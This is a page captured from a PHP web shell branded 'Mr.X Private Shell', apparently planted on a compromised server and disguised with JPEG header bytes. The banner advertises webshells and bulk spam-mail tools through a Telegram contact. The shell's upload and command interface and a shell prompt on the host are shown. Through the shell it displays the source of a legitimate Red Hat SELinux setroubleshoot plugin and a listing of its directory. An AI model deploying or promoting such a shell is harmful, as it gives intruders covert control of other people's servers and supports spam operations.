����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

dccreditrepairto@216.73.216.185: ~ $
#
# Copyright (C) 2006-2011 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

import selinux
from stat import *
import gettext
translation=gettext.translation('setroubleshoot-plugins', fallback=True)
_=translation.gettext

from setroubleshoot.util import *
from setroubleshoot.Plugin import Plugin

class plugin(Plugin):
    summary =_('''
    SELinux is preventing $SOURCE_PATH from loading $TARGET_PATH which requires text relocation.
    ''')

    problem_description = _('''
    The $SOURCE application attempted to load $TARGET_PATH which
    requires text relocation.  This is a potential security problem.
    Most libraries do not need this permission. Libraries are
    sometimes coded incorrectly and request this permission.  The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    web page explains how to remove this requirement.  You can configure
    SELinux temporarily to allow $TARGET_PATH to use relocation as a
    workaround, until the library is fixed. Please file a bug report.
    ''')

    unsafe_problem_description = _('''
    The $SOURCE application attempted to load $TARGET_PATH which
    requires text relocation.  This is a potential security problem.
    Most libraries should not need this permission.   The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">
    SELinux Memory Protection Tests</a>
    web page explains this check.  This tool examined the library and it looks
    like it was built correctly. So setroubleshoot can not determine if this
    application is compromised or not.  This could be a serious issue. Your
    system may very well be compromised.

    Contact your security administrator and report this issue.

    ''')

    unsafe_fix_description = "Contact your security administrator and report this issue."

    fix_description = _('''
    If you trust $TARGET_PATH to run correctly, you can change the
    file context to textrel_shlib_t. "chcon -t textrel_shlib_t
    '$TARGET_PATH'"
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t textrel_shlib_t '$FIX_TARGET_PATH'"

    ''')

    unsafe_if_text = "If this issue occurred during normal system operation."

    unsafe_then_text = """This alert could be a serious issue and your system could be compromised. Setroubleshoot examined '$FIX_TARGET_PATH' to make sure it was built correctly, but can not determine if this application has been compromised."""

    unsafe_do_text = "Contact your security administrator and report this issue"

    if_text = "If you trust $TARGET_PATH to run correctly and want to allow $SOURCE to load it"

    then_text = "You need to change the label on '$FIX_TARGET_PATH' to textrel_shlib_t."

    do_text = """# chcon -t textrel_shlib_t '$FIX_TARGET_PATH'
If you want this to survive a relabel, execute
# semanage fcontext -a -t textrel_shlib_t '$FIX_TARGET_PATH';restorecon -v '$FIX_TARGET_PATH'
"""

    fix_cmd = """/usr/sbin/semanage fcontext -a -t textrel_shlib_t '$FIX_TARGET_PATH';/usr/sbin/restorecon -v '$FIX_TARGET_PATH'"""

    def init_args(self, args):
        if len(args) > 0:
            self.fixable = False
            self.report_bug = True

    def get_problem_description(self, avc, args):
        if len(args) > 0:
            return self.unsafe_problem_description
        return self.problem_description

    def get_if_text(self, avc, args):
        if len(args) > 0:
            return self.unsafe_if_text
        return self.if_text

    def get_then_text(self, avc, args):
        if len(args) > 0:
            return self.unsafe_then_text
        return self.then_text

    def get_do_text(self, avc, args):
        if len(args) > 0:
            return self.unsafe_do_text
        return self.do_text

    def __init__(self):
        Plugin.__init__(self,__name__)
        self.fixable = True
        self.button_text = _("Change label on the library.")
        self.set_priority(10)

    def analyze(self, avc):
        import subprocess
        if avc.has_any_access_in(['execmod']):
            # MATCH
            # from https://docs.python.org/2.7/library/subprocess.html#replacing-shell-pipeline
            try:
                p1 = subprocess.Popen(['eu-readelf', '-d', avc.tpath], stdout=subprocess.PIPE)
                p2 = subprocess.Popen(["fgrep", "-q", "TEXTREL"], stdin=p1.stdout, stdout=subprocess.PIPE)
            except:
                return None
            p1.stdout.close()  # Allow p1 to receive a SIGPIPE if p2 exits.
            p1.wait()
            p2.wait()
            if p2.returncode == 1:
                return self.report(["unsafe"])

            mcon = selinux.matchpathcon(avc.tpath.strip('"'), S_IFREG)[1]
            if mcon.split(":")[2] == "lib_t":
                return self.report()
        return None

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 2 B 0644
allow_anon_write.py File 3.25 KB 0644
allow_execheap.py File 2.39 KB 0644
allow_execmem.py File 3.07 KB 0644
allow_execmod.py File 5.41 KB 0644
allow_execstack.py File 4.73 KB 0644
allow_ftpd_use_cifs.py File 3.41 KB 0644
allow_ftpd_use_nfs.py File 3.3 KB 0644
associate.py File 2.15 KB 0644
automount_exec_config.py File 2.66 KB 0644
bind_ports.py File 2.81 KB 0644
catchall.py File 2.89 KB 0644
catchall_boolean.py File 2.89 KB 0644
catchall_labels.py File 2.2 KB 0644
chrome.py File 2.6 KB 0644
connect_ports.py File 2.68 KB 0644
cvs_data.py File 2.58 KB 0644
dac_override.py File 2.1 KB 0644
device.py File 2.74 KB 0644
disable_ipv6.py File 1.62 KB 0644
file.py File 3.21 KB 0644
filesystem_associate.py File 2.46 KB 0644
httpd_can_sendmail.py File 1.93 KB 0644
httpd_unified.py File 2.86 KB 0644
httpd_write_content.py File 2.11 KB 0644
kernel_modules.py File 2.74 KB 0644
leaks.py File 2.49 KB 0644
mmap_zero.py File 2.33 KB 0644
mounton.py File 2.48 KB 0644
mozplugger.py File 2.79 KB 0644
mozplugger_remove.py File 2.17 KB 0644
openvpn.py File 2.76 KB 0644
public_content.py File 2.57 KB 0644
qemu_blk_image.py File 2.55 KB 0644
qemu_file_image.py File 2.88 KB 0644
restorecon.py File 5.34 KB 0644
restorecon_source.py File 3.01 KB 0644
rsync_data.py File 2.53 KB 0644
samba_share.py File 2.94 KB 0644
sandbox_connect.py File 2.23 KB 0644
selinuxpolicy.py File 3.09 KB 0644
setenforce.py File 2.39 KB 0644
sshd_root.py File 2.08 KB 0644
swapfile.py File 2.23 KB 0644
sys_module.py File 2.35 KB 0644
sys_resource.py File 2.62 KB 0644
vbetool.py File 2.52 KB 0644
wine.py File 2.92 KB 0644
xen_image.py File 2.8 KB 0644